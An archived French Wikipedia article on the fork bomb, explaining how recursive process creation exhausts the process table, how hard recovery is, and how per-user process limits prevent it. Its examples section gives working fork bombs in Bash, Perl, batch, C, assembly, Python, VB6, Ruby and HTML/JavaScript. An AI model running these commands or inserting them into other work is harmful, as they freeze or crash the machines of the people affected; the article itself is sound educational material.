Aller au contenu

Fork bomb

Un article de Wikipédia, l'encyclopédie libre.
Ceci est une version archivée de cette page, en date du 9 octobre 2021 à 20:32 et modifiée en dernier par Raphoraph (discuter | contributions). Elle peut contenir des erreurs, des inexactitudes ou des contenus vandalisés non présents dans la version actuelle.
Schéma de la bombe logique : un processus est dupliqué (forké) de manière récursive jusqu'à saturer les ressources et aboutir à un plantage ou un déni de service

La fork bomb est une forme d'attaque par déni de service contre un système informatique utilisant la fonction fork. Elle est basée sur la supposition que le nombre de programmes et de processus pouvant être exécutés simultanément sur un ordinateur est limité.

Principe

Une fork bomb fonctionne en créant un grand nombre de processus très rapidement, au moyen de la fonction fork, afin de saturer l'espace disponible dans la liste des processus gardée par le système d'exploitation. Si la table des processus se met à saturer, aucun nouveau programme ne peut démarrer tant qu'aucun autre ne termine. Même si cela arrive, il est peu probable qu'un programme utile démarre étant donné que les instances de la bombe attendent chacune d'occuper cet emplacement libre.

Non seulement les fork bombs utilisent de la place dans la table des processus, mais elles utilisent chacune du temps processeur et de la mémoire. En conséquence, le système et les programmes tournant à ce moment-là ralentissent et deviennent même impossibles à utiliser.

Les fork bomb peuvent être considérées comme un certain type de wabbit (un programme qui s'autoréplique sans utiliser de réseau).

Exemples

Soit en le lançant dans un terminal :

fork while fork
En langage Perl :
perl -e "fork while fork" &
En shell Bash :
:(){ :|:& };:

Explications :
:() définit une fonction nommée :. { :|:& } est le corps de la fonction. Dans celui-ci, la fonction s'appelle elle-même (:), puis redirige la sortie à l'aide d'un pipe (|) sur l'entrée de la même fonction : et cache le processus en fond avec &. La fonction, ensuite appelée avec :, s'appelle récursivement à l'infini.

En utilisant un fichier batch :

Bien que la fonction « fork » qui ait donné son nom aux fork bombs soit une convention Posix, Microsoft Windows permet également d’en réaliser, sur le même principe :

%0|%0

Ou également :

 
:s
start %0
goto :s
En langage C :
 
 #include <unistd.h>
 
 int main(void)
 {
   while(1) {
     /* ici on peut ajouter un malloc pour utiliser plus de ressources */ 
     fork(); 
   } 
   return 0; 
 }
En assembleur avec OS Posix :

x86 :

entry start
start:              ; Début du programme
       mov eax, 0x2 ; sauvegarde 2 (code pour le syscall fork) dans eax
       int 0x80     ; Appelle le noyaux (execute le fork)
       jmp start    ; Répète

amd64 :

entry start
start:               ; Début du programme
       mov rax, 0x39 ; sauvegarde 57 (code pour le syscall fork) dans rax
       syscall       ; Appelle le noyaux (execute le fork)
       jmp start     ; Répète
En Python :

Sous certaines plateformes (FreeBSD,Cygwin..) peut avoir des erreurs (OSError)

import os

while True:
     os.fork()

Ou

import subprocess, sys

while True:
    subprocess.Popen([sys.executable, sys.argv[0]], creationflags=subprocess.CREATE_NEW_CONSOLE)
En VB6 :
 Private Sub Main()
  Do
    Shell App.EXEName
  Loop
 End Sub
En Ruby :
loop { fork }
En HTML (et JavaScript) :

En HTML, on peut faire ouvrir deux pages dans des cadres qui ouvrent récursivement les mêmes cadres, provoquant un déni de service. Cependant, avec les navigateurs créant un processus par onglet, on peut avoir une authentique fork bomb en html et JavaScript, à condition que le navigateur ne bloque ni les popups ni le javascript :

 <html>
  <script type="text/javascript">
   function open_target_blank() {
    window.open(window.location);
   }
   window.onload = open_target_blank();
  </script>
  <body>
  </body>
 </html>

Difficulté de guérison

Une fois la fork bomb activée avec succès dans un système, il peut devenir impossible de retrouver un fonctionnement normal sans redémarrer, étant donné que la seule solution à une fork bomb est de détruire toutes ses instances. Essayer d'utiliser un programme pour tuer les processus requiert la création d'un processus, ce qui peut être impossible s'il n'y a pas d'emplacement vide dans la table des processus, ou d'espace dans les structures mémoires. Windows 10 intègre un système de prévention et va tuer tous les processus bash.exe si le fork bomb est exécuté sur le sous-système Linux.

Prévention

La fork bomb fonctionne en créant autant de processus que possible. Ainsi, pour empêcher une fork bomb, il suffit de limiter le nombre de processus pouvant être exécutés par un programme ou par un utilisateur. En permettant aux utilisateurs de non-confiance de lancer seulement un petit nombre de processus, le danger d'une fork bomb, intentionnelle ou non, est réduit. Toutefois, cela n'empêche pas un groupe d'utilisateurs de collaborer pour consommer les emplacements processus, à moins que la limite totale des processus soit plus grande que la somme des limites des processus individuels.

Protection sous Unix

Les systèmes de type Unix permettent de limiter le nombre de processus via la commande setrlimit[1]. Dans un noyau Linux, cette limite peut être indiquée via RLIMIT_NPROC. Si un processus appelle fork et que l'utilisateur possède déjà plus de RLIMIT_NPROC processus alors le fork échoue. Ici encore la limitation est propre à un utilisateur donné et ne permet pas de déjouer les attaques simultanées par plusieurs utilisateurs. Elle permet toutefois de limiter l'impact de forks accidentels, par exemple lors de la conception d'un logiciel ou d'un bogue dans une application.

Notes et références

  1. « setrlimit(3) - Linux man page », sur linux.die.net (consulté le )